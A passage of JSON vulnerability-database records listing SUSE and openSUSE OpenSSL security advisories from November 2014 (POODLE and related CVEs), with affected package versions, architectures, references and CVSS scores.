"http://download.suse.com/patch/finder/?keywords=a7e7c559a3525ff6c6964f0a67ea2bd8"], "affectedPackage": [{"OS": "SLE CLIENT TOOLS", "OSVersion": "10", "packageVersion": "0.9.8a-18.86.2", "packageName": "openssl-32bit", "packageFilename": "openssl-32bit-0.9.8a-18.86.2.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SLE CLIENT TOOLS", "OSVersion": "10", "packageVersion": "0.9.8a-18.86.2", "packageName": "openssl", "packageFilename": "openssl-0.9.8a-18.86.2.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SLE CLIENT TOOLS", "OSVersion": "10", "packageVersion": "0.9.8a-18.86.2", "packageName": "openssl", "packageFilename": "openssl-0.9.8a-18.86.2.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SLE CLIENT TOOLS", "OSVersion": "10", "packageVersion": "0.9.8a-18.86.2", "packageName": "openssl", "packageFilename": "openssl-0.9.8a-18.86.2.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SLE CLIENT TOOLS", "OSVersion": "10", "packageVersion": "0.9.8a-18.86.2", "packageName": "openssl-32bit", "packageFilename": "openssl-32bit-0.9.8a-18.86.2.s390x.rpm", "arch": "s390x", "operator": "lt"}], "description": "This OpenSSL update fixes the following issues:\n\n * Build option no-ssl3 is incomplete (CVE-2014-3568)\n * Add support for TLS_FALLBACK_SCSV to mitigate CVE-2014-3566 (POODLE)\n\n Security Issues:\n\n * CVE-2014-3566\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566</a>>\n * CVE-2014-3568\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3568\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3568</a>>\n", "edition": 1, "reporter": "Suse", "published": "2014-11-12T19:05:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "suse", "title": "Security update for OpenSSL (important)", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2014-3568"], "modified": "2014-11-12T19:05:00", "id": "SUSE-SU-2014:1409-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00010.html", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-09-04T11:48:25", "references": ["https://bugzilla.suse.com/show_bug.cgi?id=901223", "http://download.suse.com/patch/finder/?keywords=1960c50f351e883d9bffe5194436ac38", "https://bugzilla.suse.com/show_bug.cgi?id=901277"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "10.4", "packageVersion": "0.9.8a-18.86.3", "packageName": "openssl-devel", "packageFilename": "openssl-devel-0.9.8a-18.86.3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "10.4", "packageVersion": "0.9.8a-18.86.3", "packageName": "openssl", "packageFilename": "openssl-0.9.8a-18.86.3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "10.4", "packageVersion": "0.9.8a-18.86.3", "packageName": "openssl-doc", "packageFilename": "openssl-doc-0.9.8a-18.86.3.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "10.4", "packageVersion": "0.9.8a-18.86.3", "packageName": "openssl-devel", "packageFilename": "openssl-devel-0.9.8a-18.86.3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "10.4", "packageVersion": "0.9.8a-18.86.3", "packageName": "openssl", "packageFilename": "openssl-0.9.8a-18.86.3.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "10.4", "packageVersion": "0.9.8a-18.86.3", "packageName": "openssl-devel-32bit", "packageFilename": "openssl-devel-32bit-0.9.8a-18.86.3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "10.4", "packageVersion": "0.9.8a-18.86.3", "packageName": "openssl-32bit", "packageFilename": "openssl-32bit-0.9.8a-18.86.3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "10.4", "packageVersion": "0.9.8a-18.86.3", "packageName": "openssl-devel", "packageFilename": "openssl-devel-0.9.8a-18.86.3.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "10.4", "packageVersion": "0.9.8a-18.86.3", "packageName": "openssl-doc", "packageFilename": "openssl-doc-0.9.8a-18.86.3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "10.4", "packageVersion": "0.9.8a-18.86.3", "packageName": "openssl-doc", "packageFilename": "openssl-doc-0.9.8a-18.86.3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "10.4", "packageVersion": "0.9.8a-18.86.3", "packageName": "openssl-devel-32bit", "packageFilename": "openssl-devel-32bit-0.9.8a-18.86.3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "10.4", "packageVersion": "0.9.8a-18.86.3", "packageName": "openssl", "packageFilename": "openssl-0.9.8a-18.86.3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "10.4", "packageVersion": "0.9.8a-18.86.3", "packageName": "openssl-32bit", "packageFilename": "openssl-32bit-0.9.8a-18.86.3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}], "description": "This OpenSSL update fixes the following issues:\n\n * Session Ticket Memory Leak (CVE-2014-3567)\n * Build option no-ssl3 is incomplete ((CVE-2014-3568)\n * Add support for TLS_FALLBACK_SCSV to mitigate CVE-2014-3566 (POODLE)\n\n Security Issues:\n\n * CVE-2014-3567\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567</a>>\n * CVE-2014-3566\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566</a>>\n * CVE-2014-3568\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3568\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3568</a>>\n", "edition": 1, "reporter": "Suse", "published": "2014-11-11T01:04:46", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "suse", "title": "Security update for OpenSSL (important)", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2014-3567", "CVE-2014-3568"], "modified": "2014-11-11T01:04:46", "id": "SUSE-SU-2014:1387-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00007.html", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:27:16", "references": ["https://bugzilla.suse.com/show_bug.cgi?id=901223", "http://download.suse.com/patch/finder/?keywords=e15c3470343095d331f7120ec6953c18", "https://bugzilla.suse.com/show_bug.cgi?id=892403", "https://bugzilla.suse.com/show_bug.cgi?id=901277"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-hmac-32bit-0.9.8j-0.66.1.ppc64.rpm", "packageName": "libopenssl0_9_8-hmac-32bit", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "openssl-0.9.8j-0.66.1.x86_64.rpm", "packageName": "openssl", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "openssl-doc-0.9.8j-0.66.1.x86_64.rpm", "packageName": "openssl-doc", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "openssl-doc-0.9.8j-0.66.1.i586.rpm", "packageName": "openssl-doc", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "openssl-0.9.8j-0.66.1.i586.rpm", "packageName": "openssl", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "openssl-doc-0.9.8j-0.66.1.s390x.rpm", "packageName": "openssl-doc", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-hmac-0.9.8j-0.66.1.i586.rpm", "packageName": "libopenssl0_9_8-hmac", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "openssl-0.9.8j-0.66.1.ppc64.rpm", "packageName": "openssl", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-0.9.8j-0.66.1.s390x.rpm", "packageName": "libopenssl0_9_8", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-hmac-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8-hmac", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "openssl-0.9.8j-0.66.1.i586.rpm", "packageName": "openssl", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-hmac-32bit-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8-hmac-32bit", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-0.9.8j-0.66.1.ia64.rpm", "packageName": "libopenssl0_9_8", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-x86-0.9.8j-0.66.1.ia64.rpm", "packageName": "libopenssl0_9_8-x86", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl-devel-0.9.8j-0.66.1.i586.rpm", "packageName": "libopenssl-devel", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-32bit-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8-32bit", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-hmac-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8-hmac", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-hmac-0.9.8j-0.66.1.ia64.rpm", "packageName": "libopenssl0_9_8-hmac", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "openssl-0.9.8j-0.66.1.i586.rpm", "packageName": "openssl", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-0.9.8j-0.66.1.i586.rpm", "packageName": "libopenssl0_9_8", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "openssl-0.9.8j-0.66.1.ia64.rpm", "packageName": "openssl", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-32bit-0.9.8j-0.66.1.s390x.rpm", "packageName": "libopenssl0_9_8-32bit", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl-devel-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "openssl-doc-0.9.8j-0.66.1.ia64.rpm", "packageName": "openssl-doc", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-32bit-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8-32bit", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-0.9.8j-0.66.1.i586.rpm", "packageName": "libopenssl0_9_8", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-32bit-0.9.8j-0.66.1.ppc64.rpm", "packageName": "libopenssl0_9_8-32bit", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl-devel-0.9.8j-0.66.1.ia64.rpm", "packageName": "libopenssl-devel", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-hmac-0.9.8j-0.66.1.ppc64.rpm", "packageName": "libopenssl0_9_8-hmac", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl-devel-0.9.8j-0.66.1.ppc64.rpm", "packageName": "libopenssl-devel", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "openssl-0.9.8j-0.66.1.x86_64.rpm", "packageName": "openssl", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-0.9.8j-0.66.1.ppc64.rpm", "packageName": "libopenssl0_9_8", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl-devel-0.9.8j-0.66.1.s390x.rpm", "packageName": "libopenssl-devel", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "openssl-0.9.8j-0.66.1.s390x.rpm", "packageName": "openssl", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-hmac-32bit-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8-hmac-32bit", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "openssl-doc-0.9.8j-0.66.1.ppc64.rpm", "packageName": "openssl-doc", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-hmac-0.9.8j-0.66.1.i586.rpm", "packageName": "libopenssl0_9_8-hmac", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-32bit-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8-32bit", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "openssl-0.9.8j-0.66.1.x86_64.rpm", "packageName": "openssl", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-hmac-32bit-0.9.8j-0.66.1.s390x.rpm", "packageName": "libopenssl0_9_8-hmac-32bit", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-hmac-0.9.8j-0.66.1.s390x.rpm", "packageName": "libopenssl0_9_8-hmac", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "openssl-doc-0.9.8j-0.66.1.x86_64.rpm", "packageName": "openssl-doc", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-0.9.8j-0.66.1.i586.rpm", "packageName": "libopenssl0_9_8", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "openssl-doc-0.9.8j-0.66.1.i586.rpm", "packageName": "openssl-doc", "arch": "i586", "operator": "lt"}], "description": "This OpenSSL update fixes the following issues:\n\n * Session Ticket Memory Leak (CVE-2014-3567)\n * Build option no-ssl3 is incomplete (CVE-2014-3568)\n * Add support for TLS_FALLBACK_SCSV to mitigate CVE-2014-3566 (POODLE)\n\n Security Issues:\n\n * CVE-2014-3567\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567</a>>\n * CVE-2014-3566\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566</a>>\n * CVE-2014-3568\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3568\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3568</a>>\n", "edition": 1, "reporter": "Suse", "published": "2014-11-05T23:04:47", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Security update for OpenSSL (important)", "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2014-3567", "CVE-2014-3568"], "modified": "2014-11-05T23:04:47", "id": "SUSE-SU-2014:1361-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00003.html", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:42:58", "references": ["https://bugzilla.suse.com/show_bug.cgi?id=901223", "http://download.suse.com/patch/finder/?keywords=ea1bce59a09645696e580ca407c8cb20", "https://bugzilla.suse.com/show_bug.cgi?id=901277"], "affectedPackage": [{"OS": "SUSE Manager 1.7 for SLE", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "libopenssl0_9_8-32bit-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8-32bit", "operator": "lt"}, {"OS": "SUSE Manager 1.7 for SLE", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "libopenssl0_9_8-hmac-32bit-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8-hmac-32bit", "operator": "lt"}, {"OS": "SUSE Manager 1.7 for SLE", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "openssl-0.9.8j-0.66.1.x86_64.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "SUSE Manager 1.7 for SLE", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "openssl-doc-0.9.8j-0.66.1.x86_64.rpm", "packageName": "openssl-doc", "operator": "lt"}, {"OS": "SUSE Manager 1.7 for SLE", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "libopenssl0_9_8-hmac-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8-hmac", "operator": "lt"}, {"OS": "SUSE Manager 1.7 for SLE", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "libopenssl0_9_8-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8", "operator": "lt"}, {"OS": "SUSE Studio Onsite", "OSVersion": "1.3", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "libopenssl-devel-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl-devel", "operator": "lt"}], "description": "This OpenSSL update fixes the following issues:\n\n * Session Ticket Memory Leak (CVE-2014-3567)\n * Build option no-ssl3 is incomplete (CVE-2014-3568)\n * Add support for TLS_FALLBACK_SCSV to mitigate CVE-2014-3566 (POODLE)\n\n Security Issues:\n\n * CVE-2014-3567\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567</a>>\n * CVE-2014-3566\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566</a>>\n * CVE-2014-3568\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3568\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3568</a>>\n", "edition": 1, "reporter": "Suse", "published": "2014-11-13T01:04:46", "title": "Security update for OpenSSL (important)", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2014-3567", "CVE-2014-3568"], "modified": "2014-11-13T01:04:46", "id": "SUSE-SU-2014:1387-2", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00012.html", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:42:58", "references": ["https://bugzilla.suse.com/show_bug.cgi?id=901223", "https://bugzilla.suse.com/show_bug.cgi?id=901277"], "affectedPackage": [{"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1j-1.68.1", "packageName": "libopenssl1_0_0-debuginfo", "packageFilename": "libopenssl1_0_0-debuginfo-1.0.1j-1.68.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1j-11.56.1", "packageName": "libopenssl-devel", "packageFilename": "libopenssl-devel-1.0.1j-11.56.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1j-11.56.1", "packageName": "libopenssl1_0_0-debuginfo", "packageFilename": "libopenssl1_0_0-debuginfo-1.0.1j-11.56.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1j-11.56.1", "packageName": "openssl", "packageFilename": "openssl-1.0.1j-11.56.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1j-11.56.1", "packageName": "openssl-debuginfo", "packageFilename": "openssl-debuginfo-1.0.1j-11.56.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1j-1.68.1", "packageName": "libopenssl-devel", "packageFilename": "libopenssl-devel-1.0.1j-1.68.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1j-11.56.1", "packageName": "libopenssl1_0_0", "packageFilename": "libopenssl1_0_0-1.0.1j-11.56.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1j-1.68.1", "packageName": "libopenssl1_0_0-debuginfo-32bit", "packageFilename": "libopenssl1_0_0-debuginfo-32bit-1.0.1j-1.68.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1j-1.68.1", "packageName": "openssl-doc", "packageFilename": "openssl-doc-1.0.1j-1.68.1.noarch.rpm", "arch": "noarch", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1j-1.68.1", "packageName": "openssl-debuginfo", "packageFilename": "openssl-debuginfo-1.0.1j-1.68.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1j-1.68.1", "packageName": "openssl", "packageFilename": "openssl-1.0.1j-1.68.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1j-11.56.1", "packageName": "openssl", "packageFilename": "openssl-1.0.1j-11.56.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1j-1.68.1", "packageName": "openssl-debuginfo", "packageFilename": "openssl-debuginfo-1.0.1j-1.68.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1j-11.56.1", "packageName": "libopenssl1_0_0-debuginfo", "packageFilename": "libopenssl1_0_0-debuginfo-1.0.1j-11.56.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1j-11.56.1", "packageName": "libopenssl-devel-32bit", "packageFilename": "libopenssl-devel-32bit-1.0.1j-11.56.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1j-11.56.1", "packageName": "openssl-debugsource", "packageFilename": "openssl-debugsource-1.0.1j-11.56.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1j-1.68.1", "packageName": "openssl-debugsource", "packageFilename": "openssl-debugsource-1.0.1j-1.68.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1j-11.56.1", "packageName": "libopenssl1_0_0", "packageFilename": "libopenssl1_0_0-1.0.1j-11.56.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", 